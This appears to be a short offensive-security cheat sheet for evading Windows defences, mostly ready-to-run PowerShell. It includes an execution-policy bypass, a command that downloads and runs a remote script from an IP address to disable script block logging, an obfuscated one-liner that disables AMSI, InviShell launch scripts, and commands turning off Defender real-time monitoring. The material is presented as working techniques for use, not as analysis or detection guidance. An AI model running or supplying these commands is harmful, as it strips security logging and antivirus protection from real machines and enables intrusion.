# Evasion Cheetsheet

## Turn off Execution Policies

Check the ExecutionPolicy and bypass the execution policies: 

```powershell
Get-ExecutionPolicy

Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
```

## AMSI Bypass

First disable Enhanced Script Block Logging so that AMSI is not logged.

```
iex (iwr http://172.16.100.72/sbloggingbypass.txt -UseBasicParsing)
```

Then run the below command to bypass AMSI

{% code overflow="wrap" %}

```powershell
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
```

{% endcode %}

## InviShell

InviShell can bypass all powershell security features (ScriptBlock logging, Module logging, Transcription, AMSI)

With non-admin privileges - (Recommended)

```
RunWithRegistryNonAdmin.bat
```

With Admin Privileges:

```
RunWithPathAsAdmin.bat
```

## Disable Defender/Firewall

If you have admin privs, turn off defender

```powershell
Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
Set-MpPreference -DisableIOAVProtection $true -Verbose
```